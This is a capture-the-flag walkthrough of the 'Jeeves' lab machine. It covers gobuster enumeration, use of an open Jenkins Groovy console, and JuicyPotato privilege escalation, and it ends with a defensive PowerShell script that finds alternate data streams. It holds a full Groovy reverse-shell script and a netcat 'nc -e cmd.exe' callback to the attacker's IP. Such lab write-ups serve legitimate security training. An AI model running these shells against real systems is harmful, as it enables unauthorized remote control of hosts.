# Jeeves

## Service Enumeration

`nmapAutomator.sh -H 10.10.10.63 -t all`

![](/files/-MadsKQyTWzuAf0z9MBC)

### Port 80

An HTTP service runs on port 80. Entering an input in the search bar results in a server error page, which discloses some information about the versions of the services and the OS the target is running.

![](/files/-MadsNgdPDvTao_fZCDp)

### Port 50000

Another web service, running Jetty, is on port 50000. Using the `directory-list-2.3-medium.txt` wordlist from DirBuster, we can perform directory enumeration on the target.

`gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt`

This uncovers a `/askjeeves` directory.

By going to `http://10.10.10.63:50000/askjeeves/`, we find a Jenkins page.

![](/files/-MadsQ9233V8sqWwjsx5)

## Exploitation

By going to `http://10.10.10.63:50000/askjeeves/script`, we can execute scripts on the Groovy script console.

```groovy
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
```

By changing the first line of the script, we can execute arbitrary shell commands.

![](/files/-MadsSlYQRDIcUL5_heK)

We can change the script to instead trigger a reverse shell.

Source: <https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76>

```groovy
String host="10.10.14.23";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

On our Netcat listener, we obtain a reverse shell.

![](/files/-MadsVpdC1tyjsnFd88d)

## Privilege Escalation

We can use WinPEAS to enumerate the host for privilege escalation vectors.

![](/files/-MadsYTbrPIiraQ5ww8G)

Very quickly, we see that `SeImpersonatePrivilege` is enabled for our current user. We can exploit this with JuicyPotato (<https://github.com/ohpe/juicy-potato>).

After transferring JuicyPotato.exe and Netcat, we can run the following command to get another shell:

`JuicyPotato -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\nc.exe -e cmd.exe 10.10.14.23 443" -t *`

![](/files/-MadsaVLrVLe9v27z24f)

We have successfully obtained SYSTEM privileges.

We find a `hm.txt` in place of `root.txt`.

![](/files/-MadscqVoG8zpewhcHrm)

However, the file carries an additional NTFS alternate data stream, which a plain directory listing does not show.

![](/files/-Madsfah-dkABbWwj_gA)

![](/files/-MadsjzbQsapwzic0pEs)
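Hidden streams like this one are also something a defender looks for during triage. The following PowerShell function is an added example, not part of the original writeup: it walks a directory tree and reports every stream other than the default `:$DATA` content stream. The root path, the `Zone.Identifier` allow-list and the function name are assumptions.

```powershell
# Added example (not from the original writeup): enumerate NTFS alternate data
# streams under a directory so hidden content can be found during triage.
# Every regular file has one ':$DATA' stream; anything else is an ADS.
# 'Zone.Identifier' is the benign Mark-of-the-Web stream browsers write,
# so it is flagged as expected rather than suspicious (assumption: adjust
# the allow-list for your environment).
function Find-AlternateDataStream {
    param(
        [Parameter(Mandatory = $true)]
        [string]$Root,
        [string[]]$ExpectedStreams = @('Zone.Identifier')
    )

    Get-ChildItem -LiteralPath $Root -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # Get-Item -Stream * returns one record per stream on the file.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    [pscustomobject]@{
                        File       = $file.FullName
                        Stream     = $_.Stream
                        Bytes      = $_.Length
                        Suspicious = ($ExpectedStreams -notcontains $_.Stream)
                    }
                }
        }
}

# Usage: list only the streams that are not on the allow-list, then inspect
# one of them with Get-Content -Stream (path is an assumption).
Find-AlternateDataStream -Root 'C:\Users\Administrator\Desktop' |
    Where-Object Suspicious |
    Format-Table -AutoSize
```

To read a reported stream for triage, use `Get-Content -LiteralPath <file> -Stream <name>`; `dir /R` in cmd.exe shows the same streams without the filtering.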

